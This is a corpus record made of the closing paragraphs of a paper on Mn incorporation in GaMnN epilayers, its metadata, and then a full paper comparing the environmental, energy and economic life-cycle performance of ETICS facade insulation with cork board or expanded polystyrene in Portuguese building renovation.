the growth surface is attributed to material that is not perfectly flat but exhibits slight local misorientations combined with some degree of surface disorder (Cowley 1992).
Overall, the indication from these RHEED patterns, together with the XRD spectra and SEM observations, is that nearly 1:1 stoichiometry (or slightly Ga-rich conditions) corresponds to an optimised microstructure. Fig. 1e shows a centred dark-field image formed from a diffraction spot attributed to wurtzite Ga1-xMnxN alone, as distinct from an overlap of spots due to wurtzite Ga1-xMnxN and microtwin spots from the zinc-blende Ga1-xMnxN located at 1/3<111> positions. This indicates the localisation of small grains of wurtzite Ga1-xMnxN at the growth surface. However, overlap from stacking-fault streaks through the objective aperture, due to slight imaging-beam convergence, also contributes to this dark-field image, partially highlighting the stacking disorder on one set of {111} planes. Since selected-area diffraction experiments provided no evidence for the presence of wurtzite domains through the bulk of the epilayer, and no evidence was found for hexagonal-phase material at the epilayer/substrate interface, the formation of wurtzite Ga1-xMnxN is attributed to a cool-down effect at the end of growth, whereby a slight change in surface stoichiometry might have occurred under N-rich conditions, allowing small grains of the more stable hexagonal phase to become established. The small volume fraction of these surface hexagonal grains explains why they were not detectable by XRD.
EDX measurements from the epilayers during TEM observation indicated a variation in the Mn content across the sample set, with a relatively uniform Mn content of ~3.3 at% for sample A, peaking at a value of 40.3% for sample D, while the Mn content was below the detection limit of EDX for samples grown under Ga-rich conditions. This is consistent with reports of MBE-grown wurtzite Ga1-xMnxN/sapphire, which demonstrate that N-rich (and Mn-rich) conditions are required for the successful incorporation of Mn into the crystal lattice (Haider et al 2003; Kuroda et al 2003), as assessed using EDX and SIMS, respectively.
By way of illustration, Fig. 2a presents a dark-field image of sample A, demonstrating the highly faulted nature of the epilayer and pyramidal precipitates (arrowed) extending into the GaAs buffer layer. EDX measurements confirmed the presence of Mn and As within such inclusions (Fig. 2c), whilst the associated selected-area electron diffraction patterns (Fig. 2b) confirmed that the inclusions comprised α-MnAs. The indexing of Fig. 2b is clarified with reference to the schematic diagram of Fig. 2d. The orientation relationship here between α-MnAs and GaAs is given by <11-20>MnAs // <110>GaAs and {0001}MnAs // {111}GaAs. It is emphasised that such MnAs inclusions extending into the buffer layer were identified within all the samples, with decreasing size upon transition to Ga-rich growth conditions. No evidence for Ga-Mn-N or Mn-N inclusions was found in these samples. In view of the very different levels of hardness of the epilayer and substrate, it is considered that the voids present within the GaAs buffer layer, as marked in Fig. 2a, arise from preferential ion-beam milling of localised strain centres. However, some cooperative mechanism associated with MnAs precipitate formation during growth might also be implicated in their initial formation.
In summary, N-rich conditions are required for the incorporation of Mn within Ga1-xMnxN, whilst slightly Ga-rich conditions are associated with optimised structural properties. All samples exhibited MnAs inclusions extending into the GaAs buffer layer, arising from the limited solid solubility of Mn in GaN. | 2018-10-19T13:40:19.705Z | 2005-01-01T00:00:00.000 | {
"year": 2005,
"sha1": "29a31d2e246b1a11c4b12333efa4d291655f620a",
"oa_license": "CCBY",
"oa_url": "https://nottingham-repository.worktribe.com/preview/1020402/Springer_Proc._Phys._107_(2005)_pp_155-158.pdf",
"oa_status": "GREEN",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "a0c720510713eec363f672e6ff42d6e8b59b5f98",
"s2fieldsofstudy": [
"Materials Science",
"Engineering",
"Physics"
],
"extfieldsofstudy": [
"Materials Science"
]
} |
117921137 | pes2o/s2orc | v3-fos-license | Retrofitting a Building ’ s Envelope : Sustainability Performance of ETICS with ICB or EPS
This paper analyses the environmental, energy, and economic performance of the External Thermal Insulation Composite System (ETICS), using agglomerated insulation cork board (ICB) or expanded polystyrene (EPS) as the insulation material, applied in the energy renovation of the building envelope over a 50-year study period. A comparison between ETICS using ICB and EPS, for the same time horizon, is also presented. The environmental balance is based on "Cradle to Cradle" (C2C) Life Cycle Assessment (LCA), focusing on the carbon footprint and the consumption of non-renewable primary energy (PE-NRe). The characteristics of these products in terms of thermal insulation, the increased energy performance provided by their installation in the retrofit of the building envelope, and the resulting energy savings are considered in the energy balance. The estimation of the C2C carbon and PE-NRe saved is considered in the final balance between the energy and environmental performances. ETICS with ICB is environmentally advantageous both in terms of carbon footprint and of PE-NRe: the production stage of ICB is less polluting, while EPS requires lower energy consumption to fulfil the heating and cooling needs of a flat, owing to its lower U-value, and its lower acquisition cost results in a lower C2C cost. Comparing both ETICS alternatives with reference solutions, it was found that the latter only perform better in the economic dimension, and only when the energy consumed fulfils less than 25% of the heating and cooling needs. This paper advances the current state of the art by including all the life-cycle stages and dimensions of the LCA in the analysis of solutions for the energy renovation of building envelopes.
Introduction
Currently there is a full set of renewable materials that can be used in building energy renovation, such as bamboo, wood, cork, and recycled materials, among others. Although Portugal is the world's largest producer and exporter of cork-based materials, there is no local system of incentives or support programme for the application of cork (or insulation cork boards, ICB) [1] as a sustainable material that can also improve the energy efficiency of buildings.
ICB is a renewable, 100% natural, and fully recyclable material made from natural cork without chemical adhesives or additives that can be applied on the envelope of new and refurbished buildings to improve their energy efficiency. The thermal performance of ICB is highlighted by its low thermal conductivity (between 0.040 and 0.045 W/(m·°C)). The physical and mechanical properties of cork lead to an elastic, steam-permeable, and durable product, which also has excellent thermal and acoustic insulation characteristics.
A solution for continuous external thermal insulation of walls of buildings is an External Thermal Insulation Composite System (ETICS). An improved energy efficiency of the envelope of new and refurbished buildings is provided by the application of ETICS as external rendering and insulation of walls.
ETICS comprise an insulation board applied over the substrate (glued, mechanically fixed, or both), above which one or two thin layers of reinforced render are applied, as shown in Figure 1. The latter can also be used to glue the insulation material and should have good adherence to the substrate, high resistance to cracking, low capillarity, and significant mechanical resistance to perforation and impact [1]. ETICS can have different thicknesses and compositions, particularly concerning the percentage of organic matter of the coating layers, reinforcement materials, and fastening solutions [2].
The application of an external thermal insulation in the building allows a reduction of the thermal bridges of the building and evens out the thermal transmission coefficient throughout the façade. This technique [3] allows savings in energy, lower risks of surface condensation, an improvement of the inner thermal comfort both in winter and summer, a reduction of the external wall's thickness (and thus an increase of the net inner area of the construction), a reduction of the walls' weight and of the dead loads on the building, an improvement in the façades' permeability, an easier application than other techniques, and a bigger variety of the façades' colours and textures.
The improvement of the energy efficiency of the external walls of new and refurbished buildings is ensured by the application of ETICS. As shown in Figure 1, ETICS include [4]: cement-based mortar to glue the ICB and even the wall surface, alkali-resistant glass fibre mesh placed over the ICB and inside the mortar, and pigmented mortar for smoothening and finishing made with modified potassium silicate in aqueous dispersion. The ICB in ETICS also has a high potential for worldwide export, supported by the European Technical Approval (ETA) already awarded to ETICS from some Portuguese suppliers.
ETICS with expanded polystyrene (EPS) is the most common solution in Portugal, namely because of its low cost and thermal conductivity (around 0.035 W/(m·°C)). EPS is produced from a single nonrenewable raw material (expandable polystyrene beads, oil-based) imported from a foreign country. Despite the more recent use of ICB in ETICS, the application of this renewable material is gaining momentum in Portugal and in several European countries.
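As a quick numerical illustration of these conductivity figures (not taken from the paper), the sketch below computes the thermal transmittance U = 1/(R_wall + d/λ) of a retrofitted wall for a few board thicknesses; the thermal resistance assumed for the bare wall (0.45 m²·K/W) is a made-up placeholder, while the conductivities are the ICB and EPS values quoted above.

```python
# Illustrative sketch (not from the paper): effect of insulation thickness and
# conductivity on the thermal transmittance (U-value) of a retrofitted wall,
# U = 1 / (R_wall + d / lambda). R_WALL is a hypothetical placeholder for the
# resistance of the uninsulated wall plus surface resistances.

def u_value(r_wall: float, thickness_m: float, conductivity: float) -> float:
    """Thermal transmittance in W/(m^2.K) of a wall with added insulation."""
    return 1.0 / (r_wall + thickness_m / conductivity)

R_WALL = 0.45  # hypothetical resistance of the bare wall, m^2.K/W (assumed)

for name, lam in [("ICB", 0.040), ("EPS", 0.035)]:  # W/(m.K), from the text
    for d_cm in (4, 6, 9):  # board thicknesses comparable to those studied
        u = u_value(R_WALL, d_cm / 100.0, lam)
        print(f"{name} {d_cm} cm: U = {u:.2f} W/(m2.K)")
```

For the same board thickness, the lower conductivity of EPS yields a slightly lower U-value, which matches the paper's later observation that EPS needs less operational energy for the same thickness.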
This research study includes the comparative assessment of ETICS with ICB and EPS in terms of Environmental, Economic and Energy (3E) performance. The characterisation of the 3E performance of both construction systems when used in the energy renovation of the buildings' envelope was based on reference literature, research works, data from companies, and software databases. The aims of this paper are therefore:
(a) To provide meaningful results to support decision-making in this type of intervention;
(b) To use an innovative method (see §2 for the knowledge gap that this study aims to cover) that evaluates all dimensions of performance in all the life-cycle stages (see §4);
(c) To, for the first time, use this method in the energy renovation of external walls by considering two of the most used alternatives;
(d) To apply this method to a model building (Hexa, see §3) that is representative of the most common construction and architecture practices in Portugal [5].
The environmental performance is based on Cradle to Cradle (C2C) Life-Cycle Assessment (LCA) studies and focused on the carbon footprint and on the consumption of non-renewable primary energy of the ETICS and corresponding components. The C2C economic performance considers market prices (e.g., market acquisition cost, which includes the cost of manufacture, transportation to site, and installation) and economic savings provided by these systems when used in envelope renovation [6].
"Gate to Grave" environmental and economic performances are characterized according to realistic scenarios for the following life-cycle stages: transportation and installation onsite, maintenance, demolition, and final disposal [6]. The energy performance considers the main thermal insulating characteristics of these systems, and the enhancement of the energy performance and corresponding energy savings resulting from their installation for renovation of the envelope.
State of The Art: Life Cycle Assessment (LCA) Studies of Buildings' Envelope
LCA studies of building envelope alternatives have been gaining momentum in the construction industry in several countries to help the assessment of solutions to improve the overall performance of the building envelope. This envelope is one of the most important parts of the building in terms of its 3E performance. For example, the external walls have a direct influence on that performance due to their large contribution to the envelope's whole-life cost, users' comfort, initial embodied energy, and life-cycle energy consumption.
The 3E impacts of an external wall solution directly result from the properties of the materials used (e.g., thermal properties, initial embodied energy, and design and construction process). Therefore, in the design of new construction or refurbishment alternatives for building envelopes, it is very important to have a method that enables the comparison of different solutions and determines the best solution to implement in each case. In several countries, there are ongoing studies to help the development of these methods, some of which are applied to determine the solutions with the best performance when used in the buildings' envelope, such as the following:
• The LCA of a house in Portugal was calculated considering seven alternative solutions with similar thermal performance for the exterior wall, and seven different heating systems. This study included the production stage, the maintenance requirements, and the heating energy for 50 years [7]. In the same country, two alternative external claddings (rendering and stone cladding) were compared in an interdisciplinary study of service life prediction and environmental LCA [8].
• In China, for an office building, five façade solutions were compared considering their economic cost, life-cycle environmental load and cost, and operational energy. Green and general payback times were also calculated [9,10].
• In the United States of America, 12 external wall solutions were studied in terms of embodied energy and thermal performance in a building at a cold climate region [11].
• In Australia, a study was undertaken to demonstrate the need to consider not only the life-cycle energy of the building but also that due to activities undertaken by actual users of the building, comprising: embodied energy in the production of building materials, the building's operational energy, and consumption of energy in periodic maintenance over a 30-year study period [12].
• In India, the energy consumption demands of a residential building were evaluated considering different climates and envelopes (fired clay, concrete blocks, soil cement, fly ash, and aerated concrete) in the context of that country [13].
• In the United Kingdom, an LCA from cradle to site of a low-energy house built using an offsite modular panel timber frame system was used to assess the emissions from materials used in construction, final transportation of the materials to site, wastage of materials on site, transportation of waste to final disposal, and nonrenewable energy used on site, using the external thermal envelope as the comparison unit [14].
• In Spain, a study was made, using LCA performance over an 80-year study period, for evaluating the environmental impacts of five constructive systems for the envelope of a modular house: conventional brick, conventional brick with polyurethane insulation only and also with Phase Changing Materials (PCM), hollow brick, and hollow brick with PCM [15].
• In Italy, for a conventional house and office building, envelope solutions (with different types and widths of masonry and insulating materials), facilities (heating boiler replacement), and smart systems (namely active- and passive-solar systems) were considered in the LCA performance to determine the best solution that could be applied in the construction [16]. In the same country, a low-energy building with energy generation systems was assessed using a cradle to cradle LCA in order to provide energy balances and energy and environmental payback times [17].
• In Belgium, two external wall solutions were studied via an LCA from Cradle to Grave, including the energy consumption during the use phase. A decision-support tool based on the environmental cost and quality of construction assemblies was developed and applied to this case study of a three-floor building [18].
• In Finland, a case study of a building was used to confirm the influence of material choice on the building's sustainability, including insulation and exterior cladding. However, only the environmental and economic performance were considered, and only for the production stage [19].
There are other cases and several methodologies being developed internationally with the purpose of optimizing building performance for a more sustainable construction. The one used in this study was the 3E-C2C method developed at the Instituto Superior Técnico of the University of Lisbon [6,20], which compares the 3E (Environmental, Energy, and Economy) performance of alternative solutions considering all stages of their life-cycles (from cradle to cradle, C2C), and allows the assessment, comparison, and selection of the best alternatives considering their whole-life cost, assessing the 3E impacts, and considering all contributions for each life-cycle stage.
Since energy consumption is the factor that most prominently affects the environmental and economic performance of an envelope solution, some of the studies identified here only assess the energy performance using Life-Cycle Energy Assessment (LCEA), not completing a full LCA in all dimensions of performance, and all of them are applied to new construction. Very few studies include all the life-cycle stages of the LCA, making this method and this particular study an innovation and an improvement for the 3E assessment of refurbished building envelopes relative to other studies of similar constructive solutions with similar objectives.
Case Study-Insulation Cork Board (ICB)
The model building, named Hexa, comprises a ground floor for commerce and six residential floors [21], and is representative of Portuguese buildings in both constructive and architectural practices [5]. The flat on the right in Figure 2, located in a middle floor without buildings adjacent to the east façade, is the subject of the study. Évora, in the South of Portugal, was chosen as the location for Hexa in this study.
North and South façades are the external walls of the flat that were studied. "A square metre of external wall" (the East façade being considered the same as wall W1, see Table 1, for all alternatives) is the declared unit. The reference study period is 50 years [21]. In order to consider the energy renovation of the "Hexa" building façades with ETICS using ICB, two reference solutions without insulation were considered: one with a single-leaf hollow fired-clay brick wall of 0.22 m (W1) and another with a cavity wall of the same material with two leaves of 0.15 m and 0.11 m (W8). Then, six improved solutions using ETICS with ICB were used for the single-leaf walls and six were used in the cavity walls (Table 1).
The energy renovation of reference walls (W1 and W8) is important. However, the heating and cooling needs (in terms of final energy consumption) of the flat depend, in each year of the study period, not only on the lower U-value after this intervention but also on the surface (internal or external) of the external wall where the insulation is applied. In fact, the effect of a lower U-value on decreasing the energy needs for heating and cooling is maximum if the insulation material is applied on the external surface of this wall.
The maintenance, repair, and replacement operations of each external cladding and internal coating over the life-cycle after the renovation operation are described in Table 2 (e.g., cleaning and repainting of the whole area every 5 years; repair of 5% of the area after 10 years).
3E-C2C Method
An integrated approach for the assessment of the 3E (Environmental, Energy, and Economy) life-cycle of construction assemblies or materials, closely related to a building's thermal performance from cradle to cradle (3E-C2C), was used in this research study [6,20].
The 3E-C2C method assesses the 3E impacts over the whole life-cycle (C2C) of a construction material or assembly. This method takes into account all the issues that can affect these solutions, such as their performance in the use phase of the building, and their service life and recycling potential, as shown in Table 3. The declared unit used in this study was "a square metre of external wall for 50 years from energy renovation (ETICS installation)," taking into account the use (including the reference service life of each solution) and end-of-life stages. A declared unit is the "quantity of a construction product for use as a reference unit" [22]. It is not possible to define a functional unit (quantified performance of a product system for use as a reference unit [22]) because the external wall alternatives under comparison do not have the same U-value (see Table 1). Using this approach, external wall solutions can be compared even with different heat transfer coefficients, because the LCA study considers the impacts of their production depending on their thermal insulation thickness, and the environmental impacts of their thermal performance for 50 years.
The 3E-C2C method was applied in the evaluation and comparison of the 3E performance of the energy retrofit alternatives considered in this study for two reference external walls without insulation (W1 and W8, see Table 1). The envelope renovation is provided by the application of ETICS with ICB or with EPS, considering different thicknesses of these materials. The 3E-C2C method is first applied to ETICS with ICB (§5.1, applied to the case study described in §3) and then to ETICS with EPS (§5.2, in comparison with ETICS with ICB).
The approach used in this study is in line with international and European standards and performance labels. The environmental performance results are based on C2C LCA studies and focused on the carbon footprint (expressed by the environmental impact category "Global Warming Potential", GWP) and on the consumption of non-renewable primary energy (PE-NRe) of the materials used in the energy renovation of the external walls. Even if the 3E-C2C method applied in this study considered all environmental categories recommended by European standards, to provide a meaningful comparison of a significant number of alternatives in the 3E dimensions of performance and in all life-cycle stages, the authors decided to present here only the results for the environmental categories most valued by the scientific community and by decision-makers: carbon footprint (expressed by GWP) and embodied energy (PE-NRe). The C2C economic analysis considered market prices and the "economic savings" (cooling and heating energy) given by ETICS with ICB or EPS when used in envelope renovation of buildings [23].
Environmental Performance
The quantification of the environmental performance of the 3E-C2C method follows the LCA standardised method [24] and the principles included in European standards [22,25,26]. The CML 2001 baseline Environmental Impact Assessment Method (EIAM) and corresponding environmental impact categories were used in the calculation of the LCA results. Regarding the quality of background data, the LCA databases used (Ecoinvent and ELCD) were updated within the last 10 years, and all selected datasets imply a European average technology or a specific European country. The environmental performance of each life-cycle stage is defined by:
- Product stage (A1-A3): The LCA data of the manufacture of each construction material or product started with the corresponding Life-Cycle Inventory (LCI), mainly based on updated site-specific data from Portuguese plants, thus proving its temporal, geographical, and technological representativeness. The composition considered for each material used in ETICS with ICB and EPS was based on one of the Portuguese producers [27]. A detailed inventory analysis is not included in this paper but was already provided for both insulation materials in two other papers by the authors [1,23].
- Construction process stage (A4-A5): The renovation operation corresponds to the installation of the product in the building, including removal of the old render and paint and the corresponding transportation to waste processing and disposal, and external rendering and insulation of the external wall with ETICS with EPS or ICB of variable thickness.
- Use stage, maintenance, repair, and replacement (B2-B4): The environmental impacts of the materials for maintenance, repair, and replacement operations during the study period, including the corresponding waste flows. Other impacts from these operations are not included due to their variable and unpredictable nature.
- Use stage, energy performance (B6): The 3E-C2C approach determines the energy performance from the estimation of the heating and cooling energy needs during a building's operation, calculated by the simplified assessment method described in Portuguese national regulations [28-30]. In the 3E-C2C method, these needs are divided by the area of the external wall being studied to provide a value associated with the declared unit used, and to allow the estimation of their environmental impacts. This value and the environmental impacts are estimated considering a residential heating and cooling model using an updated Portuguese electricity mix [31].
- End-of-life stage (C): The 3E-C2C considers the transport of the discarded product as part of the waste processing, including the transport of waste (C2), the waste processing (C3), and the waste disposal together with the physical pretreatment and management of the disposal site (C4).
The environmental impacts of demolition (C1) were not considered, as they are similar for all the alternatives.
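To illustrate how these per-stage results roll up into the cradle-to-cradle totals and stage shares discussed in the results, here is a minimal sketch; all per-stage values are invented placeholders, not results from the study.

```python
# Minimal sketch of how per-stage LCA results combine into a cradle-to-cradle
# total, using the stage labels from the text (A1-A3, A4-A5, B2-B4, B6, C2-C4).
# Every number below is a hypothetical placeholder.

gwp_per_stage = {          # kg CO2 eq per m2 of external wall (placeholders)
    "A1-A3 product": 12.0,
    "A4-A5 construction": 1.0,
    "B2-B4 maintenance": 6.5,
    "B6 operational energy": 20.0,
    "C2-C4 end of life": 0.5,
}

c2c_total = sum(gwp_per_stage.values())
for stage, gwp in gwp_per_stage.items():
    print(f"{stage}: {gwp:5.1f} kg CO2 eq ({gwp / c2c_total:.0%} of C2C)")
print(f"C2C total: {c2c_total:.1f} kg CO2 eq")
```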
Economic Performance
The economic module of the 3E-C2C method follows the whole-life cost (WLC) approach [32] and the principles in the European standards [33]. The comparison unit between the solutions is based on the net present value (NPV) throughout the study period and considers the needs of energy for heating and cooling and the operation costs of the different substages. The NPV is estimated using the formulas presented in Table 4, where Cev_n is the application of the EIAM (environmental impact assessment method) eco-costs, Cec_n the economic cost of the product and construction process stages, and Ceg_n the economic cost of the use stages. Concerning the discount rate, its value was defined based on previous studies [34,35]. Based on those studies, if a lower value is used, the difference between alternatives decreases, despite the increase of the NPV for all of them. The lower the discount rate, the greater the influence of future costs in the life-cycle costs, due to an increase in the contribution of the maintenance and operation stages. For each life-cycle stage, the economic performance is defined by:
- Product and construction process stages (A1-A5): The installation cost of the ETICS in the building corresponds to the renovation described in the construction process, excluding the costs of workmanship for the removal of the old render and paint and of scaffolding installation on the external area of the wall. These costs were provided by one of the Portuguese producers of ETICS with ICB, previous research studies [6,20,33], construction firms, market surveys and building materials suppliers [21], and reference national documents [37].
- Use stage, maintenance, repair, and replacement (B2-B4): The economic cost in year "n" per m² of external wall includes the maintenance, repair, and replacement operations incurred in that year.
- Use stage, energy cost (B6): The energy cost in year "n" per square metre of external wall corresponds to the price, at constant prices, of the heating and cooling energy calculated by the simplified assessment method described in Portuguese national regulations [28-30].
- End-of-life stage (C and D): The economic cost in year 50 per m² of external wall only includes costs for transport and disposal of the building assemblies, and costs and/or revenues from recycling, reuse, and energy recovery [38,39].
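The B6 energy-cost term and its discounting can be sketched as follows. The electricity price, equipment efficiencies, and areas are the reference values given with the Table 4 notation; the nominal heating/cooling needs and the discount rate are made-up placeholders, so the printed numbers are purely illustrative.

```python
# Hedged sketch of the annual heating/cooling energy cost per m2 of wall and
# its net present value over the 50-year study period, using the Table 4
# symbols (T, N_ic, eta_i, N_vc, eta_v, A_ap, A_ew). N_ic, N_vc, and the
# discount rate are assumptions, not values from the paper.

T = 0.139                    # EUR/kWh, household electricity price, no VAT
ETA_I, ETA_V = 1.0, 3.0      # reference efficiencies of heating / cooling
A_AP, A_EW = 129.96, 40.27   # net floor area / external wall area, m2

def annual_energy_cost(n_ic, n_vc, fraction=0.10):
    """Energy cost in year n, EUR per m2 of external wall.

    n_ic / n_vc: nominal heating / cooling needs, kWh per m2 of floor per year.
    fraction: share of the nominal needs actually met (10% is the default
    scenario in the national regulation; 35% and 50% simulate future use).
    """
    needs = (n_ic / ETA_I + n_vc / ETA_V) * fraction   # kWh per m2 of floor
    return T * needs * A_AP / A_EW

def npv(annual_cost, years=50, rate=0.03):  # the discount rate is assumed
    return sum(annual_cost / (1 + rate) ** n for n in range(1, years + 1))

cost = annual_energy_cost(n_ic=40.0, n_vc=15.0)  # made-up nominal needs
print(f"annual: {cost:.2f} EUR/m2, NPV over 50 years: {npv(cost):.2f} EUR/m2")
```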
Comparison of the Carbon and Energy Consumption Balances of ETICS with ICB
The results achieved in the comparison of the environmental and energy consumption balances concerning the C2C carbon footprint of the external wall alternatives, expressed through the GWP (Figure 3), demonstrated an environmental impact of the alternatives at stages A1-A3 of between 72% and 74% of the total C2C GWP (without energy for heating or cooling), and at stages C2-C4 and D of between 1% and 3% of the total C2C GWP (without energy for heating or cooling), directly proportional to the thickness of insulation applied. The GWP of the B2-B4 stages is similar for all alternatives, due to their equal maintenance strategy shown in Table 2, and represents 32% to 39% of their C2C GWP in the improved solutions and about 98% for the reference walls.
The C2C consumption of PE-NRe (Figure 4) of the external wall alternatives expresses a performance similar to GWP. The impact at stages A1-A3 represents between 61% and 66%, and at the end-of-life between −1% and 0%. The B2-B4 stages represent the remaining 98% of C2C PE-NRe for the reference solution, and between 32% and 39% for the remaining solutions, without considering the energy needed for heating and cooling (in terms of final energy consumption).
Energy Savings in Heating and Cooling of ETICS with ICB
The results achieved in the economic balance concerning the "environmental impact savings" demonstrated that the application of the maximum thickness of ICB in ETICS (9 cm) on the external surface of these walls can result in a carbon saving of 24% to 31%. Similar results were achieved for the "environmental impact savings" in consumption of PE-NRe for the heating and cooling energy during the study period. Thus, analysing the C2C PE-NRe and GWP with energy for heating and cooling, it was found that the alternatives with ETICS with ICB present 14% to 26% lower impacts than the reference ones.
Economic Costs and Benefits of ETICS with ICB
The results achieved for the economic balance regarding the use of ETICS with ICB show that the NPV of the C2C cost of the external wall alternatives (Figure 5) is proportional to the thickness of ICB applied, with stages A1-A3, A4, and A5 varying from 31% to 33% and the end-of-life at 1%. The NPV of the maintenance, repair, and replacement operations (stages B2-B4) is similar for all alternatives and represents between 52% and 55% for the reference walls and 41% for the remaining solutions. The remaining contribution to the NPV, corresponding to the heating and cooling needs, is about 46% for W1 and 43% for W8, and represents 24% to 26% for the remaining solutions.
With the results shown in Figure 5, one can conclude that there are no wall alternatives with ETICS with ICB that can provide any "economic savings" in comparison to the reference solutions. However, the results shown were obtained considering a consumption of energy during the B6 substage to satisfy only 10% of the needs for heating and cooling (a realistic value for Portugal at present). These "economic savings" only arise, as shown in Figure 6, if higher values are considered to simulate future expectable scenarios for dwellings or multi-family residential buildings. In this figure, it is possible to conclude that, considering a consumption of energy during the B6 substage to fulfil 35% or more of the heating and cooling needs, the alternatives with 9 cm of ICB in ETICS (W7 in the single-leaf wall group) have a better performance than the reference walls. In the cavity wall group, this value has to be increased to 50% for another alternative with 9 cm of ICB in ETICS (W14) to be cheaper than the reference walls.
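The break-even behaviour reported around Figure 6 can be reproduced qualitatively with a toy sweep over the share of energy needs actually met; every cost below is an invented placeholder rather than a value from the study, so only the shape of the result (the NPV ordering flipping at some consumption share) is meaningful.

```python
# Illustrative break-even search (all inputs hypothetical): sweep the share of
# heating/cooling needs actually met and find where a retrofit's NPV drops
# below the reference wall's, mirroring the 35%/50% thresholds reported.

def npv_total(install_cost, annual_energy_at_100pct, fraction,
              years=50, rate=0.03):
    """NPV in EUR/m2: upfront cost plus discounted annual energy costs."""
    energy = annual_energy_at_100pct * fraction
    return install_cost + sum(energy / (1 + rate) ** n
                              for n in range(1, years + 1))

REF_INSTALL, REF_ENERGY = 40.0, 18.0      # EUR/m2 (placeholders)
ETICS_INSTALL, ETICS_ENERGY = 95.0, 10.0  # EUR/m2 (placeholders)

for pct in range(10, 55, 5):
    f = pct / 100.0
    ref = npv_total(REF_INSTALL, REF_ENERGY, f)
    etics = npv_total(ETICS_INSTALL, ETICS_ENERGY, f)
    marker = "  <- ETICS cheaper" if etics < ref else ""
    print(f"{pct:2d}%: ref {ref:7.1f} vs ETICS {etics:7.1f} EUR/m2{marker}")
```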
Comparative 3E Performance of ETICS with ICB and Expanded Polystyrene (EPS)
In this section, in order to compare the energy renovation of the "Hexa" building façades with ETICS using EPS or ICB, the same two reference solutions presented before (W1 and W8) were considered. Then, six previously studied solutions using ETICS with ICB (W4, W6, W7, W11, W13, W14) and six new ones using ETICS with EPS (WE4, WE6, WE7, WE11, WE13, WE14) were compared (Table 5). The study parameters used for the comparison of the 3E performance of all these solutions are the same as those described in §4.
The comparison presented in this section is made between improved solutions with the same thickness of insulation in both construction systems and solutions with the same U-value, even though the difference between U-values of solutions with the same thickness of EPS or ICB is lower than 10%.
The comparison of the energy performance considered the main thermal insulating characteristics of ETICS with EPS or with ICB as insulating material, including the improvements in the energy performance of the building's envelope after its installation for retrofitting and the corresponding energy savings. Because of ongoing changes in building occupancy and in comfort demands that lead to a higher consumption of energy by heating and cooling equipment, the following scenarios were considered:
- The default scenario: 10% of the energy needs, according to the national regulation.
- Higher values: 30% and 50%, which simulate future expectable scenarios for dwellings or multi-family residential buildings [40]. Both values were used in previous studies [34,41] because telecommuting is ever more frequent, and elderly people also stay at home most of the day, which means that energy needs for residential buildings can be estimated based on the use of heating or cooling equipment for much more than the 10% of daytime prescribed in the national regulation.
Comparison of the Carbon and Energy Consumption Balances of ETICS with ICB or EPS Boards
The importance of the use of local renewable resources in buildings for energy renovation is highlighted by this study, namely the application of ETICS with ICB as external rendering and insulation of external walls, as an alternative to the application of the same system with a non-renewable insulating material (EPS). This section presents the results achieved in the comparison of the environmental and energy consumption balances related to the application of the 3E-C2C method to the use of these construction systems in 12 of the 14 external wall alternatives defined for this study.
The results achieved in the comparison of the C2C carbon footprint of the external wall alternatives, expressed by the GWP (Figure 7), demonstrated an environmental advantage of the alternatives with ETICS with ICB at stages A1-A3 of between 29% and 54% (without energy for heating or cooling) when compared to solutions of similar thickness using EPS. In fact, this difference is proportional to the thickness of the insulation board applied on the external surface. The environmental disadvantage of EPS results from the use of nonrenewable resources in its production. The GWP of the B2-B4 stages is similar for all alternatives, due to their equal maintenance strategy (Table 2), and represents between 23% and 39% of their C2C GWP, without considering the energy consumption for heating and cooling.
The C2C consumption of PE-NRe (Figure 8) expresses a performance similar to GWP. In fact, the environmental advantage of the ETICS with ICB insulation at stages A1-A3 in comparison to the EPS solution is also proportional to the thickness of the insulation board applied and can vary from 44% to 78%, thus confirming the environmental advantage of using renewable materials in the production of the insulating element.
Comparison of the Energy Savings in Heating and Cooling of ETICS with ICB or EPS
The results achieved in the comparison of the economic balance concerning the "environmental impact savings" demonstrate that the use of the maximum thickness (9 cm) of insulation in ETICS with ICB or EPS on the external surface of these walls can result in a carbon saving, in comparison with the reference alternatives, of 24% to 31%. Similar results were achieved for the "environmental impact savings" in consumption of PE-NRe for the heating and cooling energy during the study period. Thus, analysing the C2C PE-NRe and GWP with energy for heating and cooling, it was found that the alternatives with ETICS with ICB or EPS present 13% to 26% lower impacts than the reference ones.
These "environmental impact and economic savings" during the B6 substage are expressed in this study per m² of the external wall of the chosen flat, but the corresponding savings provided by the implementation of this energy renovation in Portugal or in other countries can be extrapolated depending on the thermal performance characteristics of the majority of existing buildings.
Comparison of the Economic Costs and Benefits of ETICS with ICB or EPS
The results achieved in the comparison of the economic balance concerning the NPV of the C2C cost of the external wall alternatives (Figure 9) show that the use of EPS in ETICS provides a saving in the acquisition costs at stages A1-A3, A4, and A5 varying from 28% to 30%. When analysing the NPV of the C2C cost, this value is reduced due to the significance of the maintenance and energy costs, but it still reveals an economic advantage of using EPS in ETICS due to its lower market cost when compared with ICB. With the results from Figure 9, it is also possible to conclude that none of the wall alternatives where ETICS with ICB or with EPS were applied provide any "economic savings" in comparison to the reference solutions. However, the results shown were obtained considering a consumption of energy corresponding to only 10% of the needs for heating and cooling during the B6 substage. If higher values (35% and 50%) are used to simulate future expectable scenarios for dwellings or multi-family residential buildings, these "economic savings" become more significant. In fact, Figure 10 demonstrates that the alternatives with 9 cm of ICB in ETICS have a better performance than the reference walls for an energy consumption fulfilling 35% (W7 in the single-leaf wall group) or 50% (W14 in the cavity wall group) of the heating and cooling needs. For a consumption value of 25%, the alternative of ETICS with 9 cm of EPS (WE7) becomes the best alternative in the single-leaf wall group. In the cavity wall group, the WE14 solution (also with 9 cm of EPS) becomes the best alternative only for a consumption pattern of 35%. Nevertheless, the alternatives with ICB in ETICS always present a higher NPV of the C2C cost than the ones with EPS, independently of the consumption pattern considered for the use stage, because of the higher acquisition cost and U-value for the same thickness of insulation.
Discussion and Conclusions
The results of this study show that external wall alternatives of ETICS with ICB are environmentally advantageous when producing the construction materials used, in terms of the categories "Global Warming Potential" (GWP) and consumption of nonrenewable primary energy (PE-NRe) in comparison with the same solution with EPS.
If ETICS with ICB and with EPS are compared considering the same thickness, the EPS solution requires lower energy consumption to fulfil the heating and cooling needs of the flat due to its lower U-value. This solution always presents a lower "Cradle to Cradle" (C2C) cost because of its lower acquisition cost.
